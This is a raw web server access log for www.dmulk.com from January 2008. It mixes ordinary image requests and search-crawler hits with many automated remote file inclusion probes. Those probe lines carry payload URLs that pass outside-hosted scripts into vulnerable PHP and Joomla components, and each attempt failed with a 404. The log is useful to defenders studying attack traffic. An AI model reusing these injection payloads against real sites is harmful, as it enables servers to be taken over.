72.220.223.94 - - [06/Jan/2008:10:03:43 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000246.jpg HTTP/1.1" 200 746597 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:44 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000004.jpg HTTP/1.1" 200 559417 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:44 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000207.jpg HTTP/1.1" 200 722685 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:45 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000136.jpg HTTP/1.1" 200 737141 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:45 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000225.jpg HTTP/1.1" 200 758217 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:45 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000251.jpg HTTP/1.1" 200 762875 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:46 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000188.jpg HTTP/1.1" 200 836334 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:46 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000013.jpg HTTP/1.1" 200 562674 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:47 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000229.jpg HTTP/1.1" 200 826013 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:47 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000185.jpg HTTP/1.1" 200 773497 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:48 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000253.jpg HTTP/1.1" 200 817672 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:48 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000021.jpg HTTP/1.1" 200 651918 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:48 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000187.jpg HTTP/1.1" 200 760935 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:48 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000193.jpg HTTP/1.1" 200 836136 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:49 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000233.jpg HTTP/1.1" 200 769073 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:50 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000264.jpg HTTP/1.1" 200 704661 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:51 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000094.jpg HTTP/1.1" 200 660073 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:51 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000022.jpg HTTP/1.1" 200 507829 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000224.jpg HTTP/1.1" 200 774954 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000241.jpg HTTP/1.1" 200 766274 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:52 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000025.jpg HTTP/1.1" 200 776473 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:53 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000139.jpg HTTP/1.1" 200 674897 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:03:53 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000170.jpg HTTP/1.1" 200 766667 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=494895" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:10:08:32 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:10:08:32 -0800] "GET //login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:10:08:32 -0800] "GET /logs//login.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.27.10 - - [06/Jan/2008:10:09:49 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://kampret.lu/me.nat????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.27.10 - - [06/Jan/2008:10:09:49 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://kampret.lu/me.nat????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.27.10 - - [06/Jan/2008:10:09:50 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://kampret.lu/me.nat????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:10:10:00 -0800] "GET /akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.228.114 - - [06/Jan/2008:10:10:00 -0800] "GET /akocomments.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:10:10:29 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yinqixing.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:10:10:30 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yinqixing.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:10:10:30 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.yinqixing.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.220.223.94 - - [06/Jan/2008:10:10:53 -0800] "GET /bikes/dteel/EQ2/Screenshots/EQ2_000165.jpg HTTP/1.1" 200 832088 "http://www.guildportal.com/ContentControls/Support/FullGallery.aspx?GuildID=80731&TabID=695681&Category=164736" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:10:13:22 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:10:13:22 -0800] "GET //skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:10:13:23 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.55.237.185 - - [06/Jan/2008:10:16:09 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://r5f5i5.nm.ru/tool/666.tester? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
88.55.237.185 - - [06/Jan/2008:10:16:09 -0800] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://r5f5i5.nm.ru/tool/666.tester? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1" "www.dmulk.com"
74.6.22.204 - - [06/Jan/2008:10:17:40 -0800] "GET /logs/access_080102.log HTTP/1.0" 200 356516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
161.58.198.111 - - [06/Jan/2008:10:18:34 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:10:22:01 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:10:22:01 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [06/Jan/2008:10:22:01 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:10:26:23 -0800] "GET /index.php?mod=[existinghttp://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:10:26:33 -0800] "GET /logs/index.php?mod=[existinghttp://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:10:27:34 -0800] "GET //login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [06/Jan/2008:10:28:27 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:10:28:56 -0800] "GET /logs/access_071222.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:10:28:56 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.104 - - [06/Jan/2008:10:28:57 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.226.14 - - [06/Jan/2008:10:29:48 -0800] "GET /logs/index.php?index=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.120.226.14 - - [06/Jan/2008:10:29:48 -0800] "GET /index.php?index=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.19.169 - - [06/Jan/2008:10:31:13 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.104 - - [06/Jan/2008:10:35:43 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.165 - - [06/Jan/2008:10:36:42 -0800] "GET /minamijewelry/?N=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.103 - - [06/Jan/2008:10:40:24 -0800] "GET /logs/access_071119.log HTTP/1.0" 200 21994 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.31.52 - - [06/Jan/2008:10:41:50 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.31.52 - - [06/Jan/2008:10:41:50 -0800] "GET //admin.php?include_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.31.52 - - [06/Jan/2008:10:41:50 -0800] "GET /logs//admin.php?include_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:42:26 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:42:26 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:42:27 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:42:27 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:42:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:42:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.173 - - [06/Jan/2008:10:44:44 -0800] "GET /logs/access_071124.log HTTP/1.0" 200 55613 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:10:45:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.119.244.66 - - [06/Jan/2008:10:50:29 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [06/Jan/2008:10:50:30 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.66 - - [06/Jan/2008:10:50:30 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.phys.uu.nl/~spada/guestbook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:50:39 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:10:50:39 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:10:55:03 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.222.23.58 - - [06/Jan/2008:10:55:04 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.54.177.55 - - [06/Jan/2008:10:57:15 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.freewebs.com/scanspread/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.177.55 - - [06/Jan/2008:10:57:16 -0800] "GET //login.php?dir=http://www.freewebs.com/scanspread/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.54.177.55 - - [06/Jan/2008:10:57:16 -0800] "GET /logs//login.php?dir=http://www.freewebs.com/scanspread/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:11:00:03 -0800] "GET /index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
85.214.28.224 - - [06/Jan/2008:11:00:03 -0800] "GET /logs/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
87.106.18.108 - - [06/Jan/2008:11:03:01 -0800] "GET /logs/access_071229.log/calendar/include.php?path[docroot]=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.108 - - [06/Jan/2008:11:03:02 -0800] "GET /calendar/include.php?path[docroot]=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.108 - - [06/Jan/2008:11:03:02 -0800] "GET /logs/calendar/include.php?path[docroot]=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:11:05:55 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:11:05:55 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:11:05:55 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:11:05:56 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:11:05:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.67.237.143 - - [06/Jan/2008:11:05:56 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:07:50 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
141.30.61.152 - - [06/Jan/2008:11:07:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
